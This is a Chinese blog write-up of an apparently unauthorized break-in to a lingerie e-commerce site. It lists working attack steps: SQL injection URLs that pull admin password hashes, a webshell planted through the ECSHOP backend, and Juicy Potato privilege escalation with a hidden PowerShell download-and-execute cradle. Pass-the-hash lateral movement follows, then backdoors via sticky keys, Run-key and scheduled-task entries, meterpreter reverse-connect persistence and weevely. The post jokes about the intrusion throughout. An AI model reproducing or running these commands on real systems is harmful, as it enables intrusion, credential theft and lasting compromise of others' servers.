【渗透实战系列】记一次内衣网站渗透测试

admin 2021年9月23日07:21:31评论140 views字数 2998阅读9分59秒阅读模式

0x01 SQL注入

【渗透实战系列】记一次内衣网站渗透测试

这站真大,不对,这站真圆.php的站随便随便一测

【渗透实战系列】记一次内衣网站渗透测试

一枚注入

【渗透实战系列】记一次内衣网站渗透测试
【渗透实战系列】记一次内衣网站渗透测试

因为只能读取32位所以使用substring分开读取 https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,(select password from admin limit 1,1),0x7e))%20# https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,substring((select password from admin limit 1,1),30,35),0x7e))%20#

【渗透实战系列】记一次内衣网站渗透测试

舒服了,这下可以给光明正大的进去选内衣了

0x02 拿shell

看看robots.txt

【渗透实战系列】记一次内衣网站渗透测试

inurl:a.com admin

进入后台发现是ECSHOP 这里原本是file改为image绕过

【渗透实战系列】记一次内衣网站渗透测试

似乎不行被重置了

这里发现可以执行sql语句而且存在绝对路径泄露

【渗透实战系列】记一次内衣网站渗透测试
【渗透实战系列】记一次内衣网站渗透测试

ok下面就好说了,写入一句话

【渗透实战系列】记一次内衣网站渗透测试

0x03 提权

【渗透实战系列】记一次内衣网站渗透测试

权限有点小低

【渗透实战系列】记一次内衣网站渗透测试

存在mysql也没其他可以利用的

【渗透实战系列】记一次内衣网站渗透测试

尝试mysql提权

【渗透实战系列】记一次内衣网站渗透测试
【渗透实战系列】记一次内衣网站渗透测试

除了目录不能上传其他条件都满足所以当我没说,上cs,powershell上线

【渗透实战系列】记一次内衣网站渗透测试

提权这里使用Juicy Potato 具体可以参考三好学生文章 选择想要的任何CLSID,链接

【渗透实战系列】记一次内衣网站渗透测试

然后我们在以system权限执行powershell

shell style.exe -p "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('powershell地址'))"" -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

这里面的双引号记得转义

【渗透实战系列】记一次内衣网站渗透测试

0x04 横向渗透

【渗透实战系列】记一次内衣网站渗透测试

为工作组环境,扫出来0.9也是一台web这里hash传递直接拿下,继续抓hash,目前以有如下账户 wiseadmin shopaccount mysql wiseadmin filetransfer demoadmin WDAGUtilityAccount

平平无奇hash传递--

【渗透实战系列】记一次内衣网站渗透测试

一个应该是web的的一个demo,然后0.7可能是数据库服务器

都是admin权限了如果想要获取system的话可以使用SelectMyParent,其实也就是j把新进程当中system进程的子进程,这里就用cs的马,先查看winlogon.exe的pid

可以看到这里为500

【渗透实战系列】记一次内衣网站渗透测试

然后把我们的systen.exe上传,执行shell SelectMyParent.exe systen.exe 500

【渗透实战系列】记一次内衣网站渗透测试

这步操作其实就是凑点字数 ,哈哈哈哈

0x05 权限维持 

这里就拿本机测试了

粘滞键后门 在windows上连续按5次“Shift”,就可以调出粘滞键

【渗透实战系列】记一次内衣网站渗透测试

粘滞键指的是电脑使用中的一种快捷键,专为同时按下两个或多个键有困难的人而设计的。粘滞键的主要功能是方便Shift等键的组合使用。粘滞键可以先按一个键位(如shift),再按另一键位,而不是同时按下两个键位,方便某些因身体原因而无法同时按下多键的人。一般的电脑连按五次shift会出现粘滞键提示

使用如下命令

cd windowssystem32move sethc.exe sethc.exe.bakcopy cmd.exe sethc.exe
【渗透实战系列】记一次内衣网站渗透测试

如果目标机是 winvista 以上的,即 winvista 以后出的系统,修改 sethc 会提示需要 trustedinstaller 权限,所以想要继续,那就需要修改所有者为Administrator,并修改其权限:

【渗透实战系列】记一次内衣网站渗透测试
【渗透实战系列】记一次内衣网站渗透测试
【渗透实战系列】记一次内衣网站渗透测试
【渗透实战系列】记一次内衣网站渗透测试

然后修改为完全控制

【渗透实战系列】记一次内衣网站渗透测试
【渗透实战系列】记一次内衣网站渗透测试

现在我们连续按下5次shift就弹出一个system权限的cmd

【渗透实战系列】记一次内衣网站渗透测试

注册表注入后门 在普通用户权限下,攻击者将会需要执行的后门程序或者脚本路径写到注册表 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 键值可以任意设置,或者直接执行如下命令添加启动项 REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun" /v test /t REG_SZ /d "C:shell.exe" 当管理员重新登录系统时,就会执行后门程序

【渗透实战系列】记一次内衣网站渗透测试

计划任务后门 

命令:schtasks /Create /tn Updater /tr c:shell.exe /sc hourly /mo 1

以上的命令会在每小时执行一次shell.exe,在win7及以下的系统使用at命令代替schtasks

meterpreter后门 

meterpreter > run persistence -U -i 5 -p 1234 -r 192.168.220.128 -A 自动启动一个匹配的exploit / multi / handler来连接到代理 -L 如果未使用%TEMP%,则在目标主机中写入有效负载的位置。-P 有效负载使用,默认为windows / meterpreter / reverse_tcp。-S 作为服务自动启动该木马(具有SYSTEM权限) -T 要使用的备用可执行模板 -U 用户登录时自动启动该木马 -X 系统引导时自动启动该木马 -h 这个帮助菜单 -i 每次连接尝试之间的时间间隔(秒) -p 运行Metasploit的系统正在侦听的端口 -r 运行Metasploit监听连接的系统的IP


缺点是容易被杀毒软件查杀,然后它就在目标机新建一个vbs文件,然后每次自动启动他

【渗透实战系列】记一次内衣网站渗透测试

web后门的话可以使用weevely 这里生成一个shell.php来测试

【渗透实战系列】记一次内衣网站渗透测试
【渗透实战系列】记一次内衣网站渗透测试

将文件放入服务器目录下,然后执行 

weevely http://192.168.220.1/shell.php

shell 可以help查看帮助 

audit.etcpasswd | 枚举/etc/passwd audit.userfiles | 列举用户/home下具有权限的文件 audit.mapwebfiles | 枚举任意Web站点的URL链接 shell.php | 编写php文件 shell.sh | 编写系统脚本 system.info | 收集系统信息 find.suidsgid | 查找SUID / SGID文件和目录 find.perms | 查找权限可读/写/可执行文件和目录 backdoor.tcp | TCP端口后门 backdoor.reversetcp | 反弹TCP连接 bruteforce.sql | 爆破指定数据库用户名密码 bruteforce.sqlusers | 爆破所有数据库用户密码 file.upload | 上传本地文件 file.upload2web | 上传二进制/ ASCII文件至目标站点文件夹并枚举URL file.enum | 在本地词表的书面枚举远程文件 file.read | 读文件 file.rm | 删除文件 file.check | 检查远程文件的状态(md5值,大小,权限等) file.download | 下载远程二进制/ ASCII文件到本地 sql.console | 启动SQL控制台 sql.dump | 备份数据库,即脱库net.scan | 端口扫描net.phpproxy | 安装远程php代理 net.ifaces | 显示远程主机网络接口信息 net.proxy | 安装隧道通信代理

执行一些windows命令

【渗透实战系列】记一次内衣网站渗透测试

执行自带命令

【渗透实战系列】记一次内衣网站渗透测试
【渗透实战系列】记一次内衣网站渗透测试
【渗透实战系列】记一次内衣网站渗透测试


【渗透实战系列】记一次内衣网站渗透测试


点赞 在看 转发

原创投稿作者:一寸一叶

【渗透实战系列】记一次内衣网站渗透测试

本文始发于微信公众号(Hacking黑白红):【渗透实战系列】记一次内衣网站渗透测试

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月23日07:21:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【渗透实战系列】记一次内衣网站渗透测试http://cn-sec.com/archives/373239.html

发表评论

匿名网友 填写信息